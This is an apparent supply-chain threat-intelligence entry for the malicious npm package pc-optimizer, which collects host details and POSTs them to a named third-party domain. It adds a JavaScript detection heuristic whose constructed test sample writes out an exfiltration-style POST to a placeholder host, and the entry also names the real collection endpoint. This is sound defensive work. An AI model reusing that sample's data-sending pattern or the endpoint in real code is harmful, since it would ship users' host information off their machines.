THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · credential theft · osv

Malicious code in pc-optimizer (npm)

pc-optimizer

Risk score

92

AI summary

Indexed incident for pc-optimizer (npm).

Description

The package's collect.js imports child_process, fs, http, https, and os, reads host identifiers via os.hostname() and os.homedir(), inspects local filesystem paths via fs.existsSync, and POSTs collected data to a hardcoded external endpoint at http://aab.sportsontheweb.net. The destination is not a registry, vendor SDK host, or documented service — it is an unrelated third-party domain bound to a POST in install/load-reachable code. The combination of system enumeration (hostname, homedir, child_process), filesystem inspection, and a hardcoded non-publisher exfiltration endpoint is the canonical host-information stealer fingerprint and provides direct attacker benefit (host fingerprinting + arbitrary collected data shipped off-host).
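
The fingerprint described above, written as a static check a reviewer could run over a package's source before installing it. This is an added example, not code from pc-optimizer or from ThreatPkg; the function name, the host allowlist and both sample sources are constructed for illustration, and the sample endpoint is a placeholder.

```javascript
// Added example: static heuristic for the host-information stealer fingerprint.
// fingerprint(), ALLOWED_HOSTS and both samples are hypothetical and constructed.
const ALLOWED_HOSTS = new Set(['registry.npmjs.org']); // assumption: expected hosts
const WATCHED_MODULES = ['child_process', 'fs', 'http', 'https', 'os'];

function fingerprint(source, allowedHosts = ALLOWED_HOSTS) {
  // Modules loaded via require('x') or import ... from 'x' (optional node: prefix).
  const modules = WATCHED_MODULES.filter((m) =>
    new RegExp(`(?:require\\(\\s*|from\\s+)['"](?:node:)?${m}['"]`).test(source));
  // Host identifier reads and filesystem probes named in the description.
  const hostReads = ['hostname', 'homedir'].filter((f) =>
    new RegExp(`\\.${f}\\s*\\(`).test(source));
  const fsProbe = /\.existsSync\s*\(/.test(source);
  // Hardcoded absolute URLs whose host is not on the allowlist.
  const hosts = [...source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)]
    .map((m) => m[1].toLowerCase());
  const unexpectedHosts = [...new Set(hosts)].filter((h) => !allowedHosts.has(h));
  const posts = /method\s*:\s*['"]POST['"]/i.test(source);
  const hasNet = modules.includes('http') || modules.includes('https');
  // Flag only the combination: enumeration + POST + non-allowlisted endpoint.
  const flagged = hasNet && modules.includes('os') && hostReads.length > 0 &&
    posts && unexpectedHosts.length > 0;
  return { modules, hostReads, fsProbe, unexpectedHosts, flagged };
}

// Constructed sample with the same shape as the description (placeholder endpoint).
const SUSPECT_SAMPLE = [
  "const os = require('os'), fs = require('fs'), http = require('http');",
  "const cp = require('child_process');",
  "const d = { h: os.hostname(), u: os.homedir(), p: fs.existsSync('/constructed/path') };",
  "http.request('http://collector.example.invalid/in', { method: 'POST' });",
].join('\n');

// Constructed benign sample: reads the hostname but only talks to the registry.
const BENIGN_SAMPLE = [
  "const os = require('os'), https = require('https');",
  "console.log('build host', os.hostname());",
  "https.get('https://registry.npmjs.org/left-pad');",
].join('\n');

console.log(fingerprint(SUSPECT_SAMPLE));
console.log(fingerprint(BENIGN_SAMPLE).flagged);
```

String matching of this kind misses obfuscated or dynamically built requires and URLs, so a clean result only means this one pattern is absent.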

Technical details

Affected versions

=1.0.1, =1.0.2, =1.0.9

Indicators

  • affected version: =1.0.1 · 75%
  • affected version: =1.0.2 · 75%
  • affected version: =1.0.9 · 75%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
